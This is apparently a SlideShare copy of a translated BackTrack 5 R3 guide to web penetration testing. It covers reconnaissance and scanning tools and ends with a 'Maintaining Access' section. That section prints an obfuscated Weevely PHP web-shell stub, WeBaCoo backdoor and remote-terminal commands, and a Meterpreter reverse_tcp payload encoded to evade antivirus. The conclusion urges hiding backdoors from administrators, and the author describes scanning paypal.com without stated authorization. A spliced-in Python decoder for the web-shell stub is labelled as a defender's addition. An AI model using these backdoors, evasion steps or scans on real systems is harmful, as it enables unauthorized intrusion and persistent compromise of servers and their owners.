Computer Security

Written by
            Caleb Bucker
            Pen-Tester – Ethical Hacker – Security Researcher

http://calebbucker.blogspot.com/
http://www.twitter.com/CalebDrugs
https://www.facebook.com/caleb.bucker
mailto:calebbucker@gmail.com

The original copy, in Spanish:
http://www.sendspace.com/file/gyljvj

                        PENETRATION TESTING
         Web Analysis ‐ Vulnerability Assessment – Exploitation 
                             Translated By  
                  Mohamed Abdel Azim Mohamed 
                                     
Index 
                                             
•   INTRODUCTION

•   METHODS OF ANALYSIS OF WEB APPLICATIONS

    1. NETWORK MAPPING
    •   Nmap
    •   Netifera

    2. INFORMATION GATHERING
    •   TheHarvester
    •   Maltego

    3. CMS IDENTIFICATION
    •   BlindElephant
    •   CMS-Explorer
    •   WhatWeb

    4. IDS/IPS DETECTION
    •   Waffit

    5. OPEN SOURCE ANALYSIS
    •   GHDB (Google Hacking DataBase)
    •   Xssed

    6. WEB CRAWLERS
    •   WebShag
    •   DirBuster

    7. VULNERABILITY ASSESSMENT AND EXPLOITATION
    •   JoomScan
    •   SqlMap
    •   Fimap
    •   Shodan
    •   W3af
    •   Uniscan
    •   Nikto

    8. MAINTAINING ACCESS
    •   Weevely
    •   WeBaCoo
    •   MsfPayload

    9. CONCLUSION
INTRODUCTION

Today, as most of us pentesters know, the analysis of web applications plays a very important role in a
security evaluation and/or penetration test, because it gives us the relevant information about the web
application, such as the plugins it uses or the type of CMS (Joomla, WordPress or another).

This helps us determine which exploit to use, or to see exactly how to exploit the vulnerabilities that
may turn up while performing the penetration test.

Penetration tests are also used to determine the security level of a computer, a LAN (Local Area Network)
or WLAN (Wireless Local Area Network), web applications and other systems, using simulated attacks
identical to those a black hat hacker or cracker would carry out, but without compromising the information
or the availability of services. This is done in order to identify potential threats to IT systems before
an (external or internal) attacker discovers them. This process is also known as Ethical Hacking.

To carry out this penetration testing procedure, BackTrack 5 R3 is used: a Linux distribution based on
Ubuntu, built precisely for these tests, as it comes with a set of very important tools that do much of
the work of collecting the necessary information about web applications, among other things.




BackTrack Wiki:
http://www.backtrack-linux.org/wiki/
Download:
http://www.backtrack-linux.org/downloads/
METHODS OF ANALYSIS OF WEB APPLICATIONS:

1. NETWORK MAPPING:
     Network mapping is the study of the physical connectivity of a network; Internet mapping is the study
     of the physical connectivity of the Internet. Network mapping is often used to determine the servers
     and operating systems running on the network. The law and ethics of port scanning are complex: a scan
     of a network can be detected by humans or by automated systems, and may be treated as a malicious act.

        The BackTrack suite includes Nmap, a tool we all know for its power and effectiveness, and which is
        very useful for carrying out this important step of a web audit.

   •   NMAP:
        Nmap ("Network Mapper") is an open source tool for network exploration and security auditing.
        Nmap uses raw IP packets in novel ways to determine what hosts are available on a network, what
        services (application name and version) they offer, what operating systems (and versions) they
        run, what type of packet filters or firewalls are in use, and dozens of other characteristics.

       Use:
       nmap www.sitio-web.com
       nmap 192.168.1.1
•   NETIFERA:
    Netifera is a network scanner that can perform passive scanning (analyzing a pcap file or sniffing
    live network traffic) and active scanning (port scanning of an entity). It identifies the hosts on
    the network. This project offers many advantages to security developers and researchers who want to
    implement new tools, as well as to the community of users of those tools.
    The tool is included in BackTrack and is found at the following location:

    Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts –
    Netifera

    Usage is very simple: enter the web address where it says "Type Address", press Enter, and the
    target website and the IPs to be audited will appear.

    In this case I entered the website www.paypal.com, on which I performed a reverse lookup, TCP connect
    scan, UDP scan, crawler, NS lookup and host name brute force.
2. INFORMATION GATHERING

  The first phase of a security assessment focuses on gathering as much information as possible about the
  web application. Information gathering is the most critical step of a web application security test. This
  task can be accomplished in many different ways: using public tools (search engines) or scanners, or by
  sending simple or specially crafted HTTP requests, it is possible to force the application to disclose
  information, for example through error messages or the versions and technologies in use.

  There are basically two types of information gathering: active and passive. In passive information
  gathering the attacker does not communicate directly with the target and tries to collect information
  that is already available on the Internet, whereas in active information gathering the attacker is in
  direct contact with the target while collecting information.

  •     THEHARVESTER:

        theHarvester is a tool to collect email accounts, user names and host names or subdomains from
        different public sources such as search engines and PGP key servers.

         Use:
        /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google
        /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp
        /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin




  •     MALTEGO:
      Maltego is a tool based on open source intelligence and forensics that shows how pieces of
      information are connected to each other. With Maltego we can find the relationships people commonly
      have today, including their social profiles (Facebook, Twitter), mutual friends, businesses related
      to the gathered information, and websites. If we collect information about an infrastructure, we
      can map the relationships between domains and DNS names.

      Location:
      Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis – Maltego
ARCHITECTURE OF MALTEGO (figure)

EXAMPLE (figure)
3. CMS IDENTIFICATION

  •   BLINDELEPHANT:
      BlindElephant is a Python-based tool used for web application fingerprinting. The tool is fast,
      uses little bandwidth and is highly automated.
      Use
             /pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms




  •   CMS-EXPLORER:
      CMS-Explorer is another fingerprinting tool for web applications; it can be used to identify the
      type of CMS in use, so that the attack can be tailored to the information obtained.
      Use:
      /pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms
•   WHATWEB:
      WhatWeb is another tool used to identify the type of content management system (CMS), blogging
      platform, statistics packages, JavaScript libraries and web servers in use. It has 900 plugins for
      web analysis purposes.
      Use:
      /pentest/enumeration/web/whatweb# ./whatweb http://sitio-web.com/
      /pentest/enumeration/web/whatweb# ./whatweb -v http://sitio-web.com/
      /pentest/enumeration/web/whatweb# ./whatweb -a 3 http://sitio-web.com/
      /pentest/enumeration/web/whatweb# ./whatweb 192.168.1.1/24




4. IDS/IPS DETECTION

      While performing a VA/PT on a domain, there is the possibility that IDS/IPS services are installed;
      these can sometimes stop several of the types of attacks that are carried out against the domain.
      Many WAFs (Web Application Firewalls) are sold to companies as a successful technique for
      mitigating vulnerabilities in web applications.

      Fortunately, a WAF is easy to detect, because most of them use signature-based detection methods;
      consequently, an attacker may try to encode parameters in order to get the attack past the WAF.

      The BackTrack suite includes a useful tool for the detection of IDS/IPS: Waffit.

  •   WAFFIT:
      It is a tool that detects the firewall a web server may have in front of it, which is very useful,
      since identifying the firewall behind the domain is a very important step in the penetration
      testing process.
      Use:
      /pentest/web/waffit# ./wafw00f.py http://sitio-web.com/
5. OPEN SOURCE ANALYSIS
     Open source analysis is performed using tools like GHDB, revhosts and XSSed. The GHDB (Google
     Hacking Database) and XSSed are websites, while revhosts is a console tool.

   •   GHDB:
        Google Hacking Database: the exploit-db team maintains a database of Google dorks that can
        greatly help a pentester's information gathering. We can use the dorks to find certain types of
        vulnerable servers or other information.

        For example, a Google dork like "Microsoft-IIS/6.0" intitle:index.of can be used to find
        servers running Microsoft IIS 6.0.




   •   XSSED:
        http://www.xssed.com/ is a website that contains a list, contributed by various authors, of
        websites vulnerable to Cross Site Scripting (XSS).

       It can be opened from: Applications - Backtrack - Information Gathering - Web Application
       Analysis - Open Source Analysis - Xssed.

6. WEB CRAWLERS

        In this last category of web analysis, the well-known crawlers are used; they help greatly in
        listing the "hidden" files and folders on a web server.

        The BackTrack suite has many tools for this type of analysis, such as DIRB, Golismero,
        SQLScan, Deblaze and WebShag.

   •   WEBSHAG:
        Webshag is a tool written in Python that combines features useful for auditing web servers, such
        as web crawling, URL scanning and file fuzzing.
        Webshag can be used to analyze a web server over HTTP or HTTPS, through a proxy and using HTTP
        authentication (Basic and Digest).
        It also offers innovative IDS evasion features intended to make correlation between requests
        more complicated (for example, using a random HTTP proxy server for each request).

        It can be opened from Applications - BackTrack - Information Gathering - Web Application
        Analysis - Web Crawlers - WebShag Gui.




•   DIRBUSTER:

    DirBuster is a Java application designed to brute force directory and file names on a web server
    / application. It is often the case that what looks like a web server in its default installation
    state actually is not, and has pages and applications hidden within it; DirBuster tries to find these.

    DirBuster comes with a total of 9 different wordlists, which makes it extremely effective at finding
    hidden files and directories. And if that were not enough, DirBuster also has the option of performing
    a pure brute force.

    It can be found at the following location: Applications - BackTrack - Vulnerability Assessment -
    Web Application Assessment - Web Application Fuzzers – DirBuster
7. VULNERABILITY ASSESSMENT AND EXPLOITATION

  The vulnerability assessment stage is where we probe our target for flaws, but before a vulnerability
  assessment, gathering information about the target is far more useful.
  The information gathering phase remains the key step before any further attack, simply because it makes
  the job easier; for example, in the earlier CMS identification stage a scanner such as BlindElephant was
  run and found the version of the installed application.
  Now, in the vulnerability assessment stage, you can use many tools (scanners) that will greatly help in
  finding vulnerabilities in the specific web server.

  •   JOOMSCAN:
      JoomScan is a Perl-based tool used to identify known vulnerabilities such as SQL injection, XSS and
      others on web servers running the Joomla platform.
      • Detects the version of Joomla! that is running.
      • Scans for and locates known vulnerabilities in Joomla! and its extensions.
      • Reports in text or HTML format.
      • Allows immediate updating of the scanner via svn.
      • Detects vulnerability types: SQL injection, LFI, RFI, XSS and others.

      It can be run from
      /pentest/web/joomscan# ./joomscan.pl -u www.sitio-web.com




  •   SQLMAP:

      sqlmap is a tool that helps automate the process of detecting and exploiting SQL injection
      vulnerabilities, allowing full access to the web server's database.
      It can be run from
      /pentest/database/sqlmap# ./sqlmap.py -u http://www.sitio-web.com/ --dbs
•   FIMAP:
    fimap is a small tool written in Python that can find, prepare, audit and automatically exploit
    Remote File Inclusion bugs in web applications. It is currently under development, but it is usable.
    The goal is to improve the quality of fimap and the security of your website.
    It can be run from
    /pentest/web/fimap# ./fimap.py -u 'http://localhost/test.php?file=bang&id=23'
    /pentest/web/fimap# ./fimap.py -g -q 'noticias.php?id='
•   SHODAN:
    Shodan is another site evaluation tool, particularly useful for pentesters. It can be used to collect
    intelligence about devices that are connected to the Internet.
    We can, for example, check whether network devices such as routers, VoIP devices, printers, cameras,
    etc., are exposed. To find out whether a service is running on the domain, the syntax would be:
    • hostname:target.com port:80,21,22
    If we simply want the results for the host name, the syntax would be:
    • hostname:target.com




•   W3AF:

    w3af is a web application security audit tool. It is basically divided into several modules such as
    Attack, Audit, Exploit, Discovery, Brute Force and Evasion, which can all be used as needed. These
    modules in turn contain several plugins; for example, we can select the XSS plugin of the Audit
    module when it is necessary to perform that particular audit.

    It can be opened from
    Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web
    Vulnerability Scanners - w3af

    Once the analysis is complete, w3af shows detailed information about the vulnerabilities found on the
    specified website, which can then be used for further exploitation.
•   UNISCAN:
    Uniscan is a web vulnerability scanner, oriented to computer security, aimed at finding
    vulnerabilities in web systems. It is licensed under the GNU General Public License 3.0 (GPL 3).
    Uniscan is developed in Perl, has easy handling of regular expressions and is also multi-threaded.

    Features:
    • Identification of system pages via a web crawler.
    • Testing of the pages found via the GET method.
    • Testing of the forms found via the POST method.
    • Support for SSL requests (HTTPS).
    • Proxy support.
    • Generation of a list of sites via Google.
    • Generation of a list of sites via Bing.
    • Client GUI written in Perl Tk.
    It can be downloaded from the following link:
    http://uniscan.sourceforge.net/?page_id=7

    It can be run with: ./uniscan.pl -u http://www.sitio-web.com/ -qweds




•   NIKTO:
    Nikto is a web server scanner that performs comprehensive tests against web servers for multiple
    items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over
    1250 servers, and version-specific problems on over 270 servers. It also checks server configuration
    items, such as the presence of multiple index files and HTTP server options.

      Nikto is a robust project that has been in development for several years and is constantly
      evolving. Some of the most interesting features of this tool include the ability to generate
      reports in various formats, integration with LibWhisker (anti-IDS) and integration with
      Metasploit, among others.

      It can be opened from
      Applications - BackTrack - Vulnerability Assessment - Web Application Assessment - Web
      Vulnerability Scanners - Nikto

      Use:
      /pentest/web/nikto# ./nikto.pl -host www.sitio-web.com




8. MAINTAINING ACCESS

  Once we have gained access to the website (target), we need to maintain access for future use, so that
  we do not have to start from scratch again and again. To do this, we can upload a web shell or backdoor
  to the web server. The encoding of the backdoor is also important, so as not to create "noise" when it
  is loaded on the server; otherwise, administrators can easily detect and remove the backdoor.
  The BackTrack 5 R3 suite incorporates good tools for carrying out this process, which are:

  •   WEEVELY:
      Weevely is an essential tool for the post-exploitation of web applications, and can be used as a
      backdoor or as a web shell to manage web accounts. Weevely looks for enabled functions such as
      system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system() and
      python_eval() on the remote server and uses whichever is available. The following is an example of
      the backdoor code generated by Weevely.

      -------------------------------------------------------------------------------------------------------------------
      eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk
      YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv
      c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK
      GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30='));
      -------------------------------------------------------------------------------------------------------------------
      It can be opened from Applications - BackTrack - Maintaining Access - Web BackDoors -
      Weevely

      Use:
      /pentest/backdoors/web/weevely# ./weevely.py generate password /root/back.php
      /pentest/backdoors/web/weevely# ./weevely.py http://www.sitio-web.com/back.php password
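      As an added defender's example (not part of the original document), the following Python script
      decodes eval(base64_decode('...')) wrappers such as the stub shown above and flags the constructs
      found inside, so that a file like this can be triaged instead of trusted. The stub quoted above is
      embedded as its sample input; the regular expression and token list are this example's own.

```python
import base64
import re

# Sample input: the Weevely stub quoted in the text above, as it would sit in a PHP file on the server.
SAMPLE_PHP = """<?php
eval(base64_decode('cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk
YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv
c2VjPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luK
GFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9mb3NlYz4nO30='));
"""

# eval(base64_decode('<blob>')) with optional whitespace; the blob itself may be wrapped across lines.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE,
)

# Constructs that, inside a decoded payload, point to a command channel rather than a library.
RISKY_TOKENS = (
    "eval(",
    "base64_decode(",
    "$_SERVER['HTTP_REFERER']",
    "$_REQUEST",
    "$_GET",
    "$_POST",
    "$_COOKIE",
    "system(",
    "passthru(",
    "shell_exec(",
    "exec(",
    "popen(",
    "proc_open(",
)


def decode_eval_base64(php_source: str) -> list:
    """Return the decoded payload of every eval(base64_decode('...')) wrapper in the source."""
    payloads = []
    for match in EVAL_B64_RE.finditer(php_source):
        blob = re.sub(r"\s+", "", match.group(1))  # undo the line wrapping
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # not valid base64: leave it for manual review
            continue
        payloads.append(raw.decode("utf-8", "replace"))
    return payloads


def risky_tokens_in(payload: str) -> list:
    """List the suspicious constructs present in a decoded payload."""
    return [token for token in RISKY_TOKENS if token in payload]


def triage(php_source: str) -> list:
    """One finding per wrapper: decoded text, indicators, and whether it evals further input."""
    findings = []
    for payload in decode_eval_base64(php_source):
        findings.append({
            "decoded": payload,
            "indicators": risky_tokens_in(payload),
            # A second eval on request-derived data (here the Referer header) is the command channel.
            "nested_eval": "eval(" in payload,
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_PHP):
        print("decoded :", finding["decoded"])
        print("flags   :", ", ".join(finding["indicators"]))
```

      Run against the stub, it shows that the outer eval only unwraps a second stage that parses the
      Referer header and evals part of it, which is what an administrator should look for in web roots.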




•   WEBACOO:
    WeBaCoo (Web Backdoor Cookie) is a backdoor that provides a terminal connection over HTTP between
    client and web server. It is a post-exploitation tool for maintaining access to a (compromised) web
    server. It was designed to operate under the radar of modern, up-to-date AV, NIDS, IPS, network
    firewalls and application firewalls, providing a stealthy mechanism for executing commands on the
    compromised server. The obfuscated file communicates via the HTTP Cookie header, validating the HTTP
    requests and responses exchanged with the web server. WeBaCoo provides a way to generate the PHP
    backdoor code using predefined payloads. It also offers a "terminal" mode in which the user can
    establish a remote connection to the server and execute commands with the privileges of the web
    service.

    The download is available from Github:
    https://github.com/anestisb/WeBaCoo

    Options:
    1) Create the obfuscated backdoor 'backdoor.php' with default settings:
    •   ./webacoo.pl -g -o backdoor.php

    2) Create the un-obfuscated backdoor 'raw-backdoor.php' using the "transit" function:
    •   ./webacoo.pl -g -o raw-backdoor.php -f 4 -r

    3) Establish a "terminal" connection to the remote host using the default settings:
    •   ./webacoo.pl -t -u http://127.0.0.1/backdoor.php

    4) Establish a "terminal" connection to the remote host, configuring some arguments:
    •   ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TTT"

    5) Establish a "terminal" connection to the remote host via an HTTP proxy:
    •   ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

    6) Establish a "terminal" connection to the remote host via an HTTP proxy with basic authentication:
    •   ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

    7) Establish a "terminal" connection to the remote host via Tor and log the activity:
    •   ./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt




•   MSFPAYLOAD:
    Metasploit can be used to create backdoors that can then be used to maintain access to the web server.
    This can be done with the help of msfpayload. The steps to create a backdoor with msfpayload are as
    follows. We must select the payload we will use to obtain a Meterpreter shell through a reverse TCP
    connection. The command would be:
    msfpayload windows/meterpreter/reverse_tcp

    This payload has two parameters: LHOST (our IP) and LPORT, the port we will use. The "R" outputs the
    payload in raw format so that we can encode it afterwards.
    msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R

    This command creates the payload, but it has to be encoded to avoid antivirus detection; this can be
    done with msfencode, piping ("|") the raw output into it:
    msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R | msfencode -e
    x86/shikata_ga_nai -t exe > bucker.exe

    -e specifies the encoder to use; in this case I'm using the shikata_ga_nai encoder. -t specifies the
    output file type (exe). To see the list of encoders available in MSF, use the following command:

    msfencode -l
9. CONCLUSION

    These are only a few of the methods you can follow to exploit vulnerabilities in a web application.

    Once we have the information about our target, we perform a vulnerability assessment in order to obtain
    information about the exploits that can be used.

    Once that is done, we exploit the vulnerabilities and, if necessary, upload a backdoor, but before that
    the backdoor must be encoded to avoid detection.

    I hope this helps you with finding vulnerabilities, exploiting them and maintaining access to your target.

Greetings.




References:
http://en.wikipedia.org/wiki/Penetration_test
http://www.giac.org/certification/web-application-penetration-tester-gwapt
http://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/
https://www.owasp.org/index.php/Web_Application_Penetration_Testing

More Related Content

PDF
What is a Hacker (part 2): How data is stolen
PPTX
Communication security 2021
PPTX
What is hacking
PPT
101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!
PPT
Network Security
PPTX
Spyware risk it's time to get smart
PPTX
Internet Security in Web 2.0
DOCX
Hacking
What is a Hacker (part 2): How data is stolen
Communication security 2021
What is hacking
101 Internet Security Tips Slideshow - Know How To Protect Your Computer Online!
Network Security
Spyware risk it's time to get smart
Internet Security in Web 2.0
Hacking

What's hot (19)

PDF
Brute Force Attack
PPTX
Information on Brute Force Attack
PPTX
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
PPTX
Ethical Hacking & Penetration Testing
PPTX
Penetration Testing
PPTX
Security Attack Analysis for Finding and Stopping Network Attacks
PPTX
Cybersecurity Cyber Usalama
PPTX
Network security - Defense in Depth
PPTX
Final project.ppt
PPTX
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
PDF
Domain 4 of CEH V11: Network and Perimeter Hacking
PDF
Domain 5 of the CEH: Web Application Hacking
PPT
XSS filter on Server side
PDF
What is Ransomware?
PPTX
Document from Sidra Saghir Asim.pptx
DOCX
Pegasus
PPTX
Ethical hacking
PPTX
Computer Networks 4
PPTX
Cyber crime trends in 2013
Brute Force Attack
Information on Brute Force Attack
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
Ethical Hacking & Penetration Testing
Penetration Testing
Security Attack Analysis for Finding and Stopping Network Attacks
Cybersecurity Cyber Usalama
Network security - Defense in Depth
Final project.ppt
Webinar: Ransomware Checklist – Are You Ready For Ransomware’s Next Wave?
Domain 4 of CEH V11: Network and Perimeter Hacking
Domain 5 of the CEH: Web Application Hacking
XSS filter on Server side
What is Ransomware?
Document from Sidra Saghir Asim.pptx
Pegasus
Ethical hacking
Computer Networks 4
Cyber crime trends in 2013
Ad

Viewers also liked (8)

DOCX
Backtrack Manual Part9
PDF
How To Build The Perfect Backtrack 4 Usb Drive
PPTX
BackTrack 4 R2 - SFISSA Presentation
DOCX
Backtrack manual Part1
DOCX
Backtrack Manual Part10
DOCX
Backtrack Manual Part2
PPT
Backtrack os 5
Backtrack Manual Part9
How To Build The Perfect Backtrack 4 Usb Drive
BackTrack 4 R2 - SFISSA Presentation
Backtrack manual Part1
Backtrack Manual Part10
Backtrack Manual Part2
Backtrack os 5
Ad

Similar to Computer security (20)

PPTX
Phases of penetration testing
PDF
IT Vulnerability & Tools Watch 2011
DOCX
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
PDF
The Web Application Hackers Toolchain
PPTX
DC612 Day - Hands on Penetration Testing 101
PDF
PDF
PDF
ethical Hack
PPT
Nomura UCCSC 2009
PDF
International Journal of Engineering Inventions (IJEI)
PDF
Owasp modern information gathering
 
PPTX
Web hacking 1.0
PDF
Gates Toorcon X New School Information Gathering
PDF
Web app penetration testing best methods tools used
PDF
PPTX
Introduction to penetration testing
PPTX
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
PPTX
( Ethical hacking tools ) Information grathring
PPTX
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
PPT
Ethical hacking
Phases of penetration testing
IT Vulnerability & Tools Watch 2011
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
The Web Application Hackers Toolchain
DC612 Day - Hands on Penetration Testing 101
ethical Hack
Nomura UCCSC 2009
International Journal of Engineering Inventions (IJEI)
Owasp modern information gathering
 
Web hacking 1.0
Gates Toorcon X New School Information Gathering
Web app penetration testing best methods tools used
Introduction to penetration testing
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
( Ethical hacking tools ) Information grathring
Dafgjgghhghfhjgghjhgy06-Footprinting.pptx
Ethical hacking

Recently uploaded (20)

PDF
Web App vs Mobile App What Should You Build First.pdf
PDF
STKI Israel Market Study 2025 version august
PDF
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
PDF
Assigned Numbers - 2025 - Bluetooth® Document
PDF
Getting started with AI Agents and Multi-Agent Systems
PDF
A contest of sentiment analysis: k-nearest neighbor versus neural network
PDF
1 - Historical Antecedents, Social Consideration.pdf
PDF
A novel scalable deep ensemble learning framework for big data classification...
PDF
Architecture types and enterprise applications.pdf
PDF
project resource management chapter-09.pdf
PDF
ENT215_Completing-a-large-scale-migration-and-modernization-with-AWS.pdf
PDF
NewMind AI Weekly Chronicles - August'25-Week II
PPTX
Chapter 5: Probability Theory and Statistics
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
PPTX
Final SEM Unit 1 for mit wpu at pune .pptx
PPTX
Group 1 Presentation -Planning and Decision Making .pptx
PPTX
Modernising the Digital Integration Hub
PDF
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
PDF
Enhancing emotion recognition model for a student engagement use case through...
PDF
NewMind AI Weekly Chronicles – August ’25 Week III
Web App vs Mobile App What Should You Build First.pdf
STKI Israel Market Study 2025 version august
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
Assigned Numbers - 2025 - Bluetooth® Document
Getting started with AI Agents and Multi-Agent Systems
A contest of sentiment analysis: k-nearest neighbor versus neural network
1 - Historical Antecedents, Social Consideration.pdf
A novel scalable deep ensemble learning framework for big data classification...
Architecture types and enterprise applications.pdf
project resource management chapter-09.pdf
ENT215_Completing-a-large-scale-migration-and-modernization-with-AWS.pdf
NewMind AI Weekly Chronicles - August'25-Week II
Chapter 5: Probability Theory and Statistics
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Final SEM Unit 1 for mit wpu at pune .pptx
Group 1 Presentation -Planning and Decision Making .pptx
Modernising the Digital Integration Hub
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
Enhancing emotion recognition model for a student engagement use case through...
NewMind AI Weekly Chronicles – August ’25 Week III

Computer security

  • 1. Computer Security Written by Caleb Bucker Pen-Tester – Ethical Hacker – Security Researcher http://calebbucker.blogspot.com/ http://www.twitter.com/CalebDrugs https://www.facebook.com/caleb.bucker mailto:calebbucker@gmail.com The Original Copy in Spanish Language http://www.sendspace.com/file/gyljvj                                 PENETRATION TESTING Web Analysis ‐ Vulnerability Assessment – Exploitation  Translated By   Mohamed Abdel Azim Mohamed   
  • 2. Index    • INTRODUCTION • METHODS OF ANALYSIS OF WEB APPLICATIONS 1. NETWORK MAPPING • Nmap • Netifera 2. INFORMATION GATHERING • TheHarvester • Maltego 3. CMS IDENTIFICATION • BlindElephant • CMS-Explorer • WhatWeb 4. IDS/IPS DETECTION • Waffit 5. OPEN SOURCE ANALYSIS • GHDB (Google Hacking DataBase) • Xssed 6. WEB CRAWLERS • WebShag • DirBuster 7. VULNERABILITY ASSESSMENT AND EXPLOITATION • JoomScan • SqlMap • Fimap • Shodan • W3af • Uniscan • Nikto 8. MAINTAINING ACCESS • Weevely • WeBaCoo • MsfPayload 9. CONCLUSIÓN
  • 3. INTRODUCTION Today, as many of us (Pen-tester's) we know that in these times the Analysis of Web Applications play a very important role in making a Safety Evaluation and / or Penetration Testing, as this gives us the appropriate information about web Application, such as the type of plugin you use, either types of Joomla CMS - WordPress or other. This will help us to determine what we should use Exploit, or see exactly how to exploit the vulnerabilities that can occur when performing penetration testing. Penetration Testing tests are also used to determine the level of security: a computer, a computer network LAN (Local Area Network) or WLAN (Wireless Local Area Network), among other Web applications, using identical simulated computer attacks those who conduct a Black Hat Hacker, or Cracker but without compromising the information or the availability of services, this is done in order to identify the potential threats in iT systems before the attacker discovers a (external or internal ). This process is also known as Ethical Hacking (Ethical Hacking). To perform this procedure Penetration Testing, BackTrack 5 R3 is used, a Linux distro based on Ubuntu perfectly made to carry out these tests, as it comes with a set of very important tools that do much to get all the necessary information about web applications, among others. BackTrack Wiki: http://www.backtrack-linux.org/wiki/ Descarga: http://www.backtrack-linux.org/downloads/
METHODS OF ANALYSIS OF WEB APPLICATIONS

1. NETWORK MAPPING

Network mapping is the study of the physical connectivity of a network; Internet mapping is the study of the physical connectivity of the Internet. Network mapping is often used to determine the servers and operating systems running on the network. The law and ethics of port scanning are complex: a scan of a network can be detected by humans or by automated systems, and may be treated as a malicious act.

The BackTrack suite includes NMAP, a tool we all know for its power and effectiveness, which is very useful for carrying out this step, so important in a web audit.

• NMAP: Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on a network, what services (application name and version) those hosts offer, what operating systems (and versions) they run, what type of packet filters or firewalls are in use, and dozens of other characteristics.

Use:
  nmap www.sitio-web.com
  nmap 192.168.1.1
• NETIFERA: Netifera is a network scanner that can perform passive scanning (analysing a pcap file or sniffing the live network) and active analysis (port scanning of an entity), and it identifies the hosts on the network. The project offers many advantages for security developers and researchers who want to implement new tools, as well as for the community of users of those tools.

This tool is included in BackTrack and is located at: Applications - BackTrack - Information Gathering - Network Analysis - Identify Live Hosts - Netifera

Usage is very easy: just enter the web address where it says "Type Address", press Enter, and the target website's hostnames and IPs to be audited are displayed.

In this case I placed the website www.paypal.com, on which I ran Reverse Lookup, TCP Connect Scan, UDP Scan, Crawler, NS Lookup and Brute Force Host Name.
2. INFORMATION GATHERING

The first phase of a security assessment focuses on gathering as much information as possible about a web application. Information gathering is the most critical step of a web application security test. It can be accomplished in many different ways: using public tools (search engines), scanners, or simply by sending ordinary or specially crafted HTTP requests, it is possible to force the application to leak information, for example through error messages that disclose the versions and technologies in use.

There are basically two types of information gathering: passive and active. In passive gathering, the attacker does not communicate directly with the target and tries to collect information that is already available on the Internet; in active gathering, the attacker is in direct contact with the target while collecting information.

• THEHARVESTER: TheHarvester is a tool to collect email accounts, user names, host names and subdomains from different public sources such as search engines and PGP key servers.

Use:
  /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 500 -b google
  /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -b pgp
  /pentest/enumeration/theharvester# ./theHarvester.py -d sitio-web.com -l 200 -b linkedin

• MALTEGO: Maltego is an information-gathering and forensics tool that shows how pieces of information are connected to each other. With Maltego we can find the relationships people most commonly have today, including their social profiles (Facebook, Twitter), mutual friends, businesses related to the information gathered, and websites. If we collect information about an infrastructure, we can map the relationships between domains and DNS names.

Location: Applications - Backtrack - Information Gathering - Network Analysis - DNS Analysis - Maltego
3. CMS IDENTIFICATION

• BLINDELEPHANT: BlindElephant is a Python-based tool used for web application fingerprinting. The tool is fast, uses little bandwidth and is highly automated.

Use:
  /pentest/web/blindelephant/src/blindelephant# ./BlindElephant.py http://sitio-web.com/ cms

• CMS-EXPLORER: Used for fingerprinting web applications; it can also identify the type of CMS in use, so that the attack can be planned according to the information obtained.

Use:
  /pentest/enumeration/web/cms-explorer# ./cms-explorer.pl -url http://sitio-web.com/ -type cms
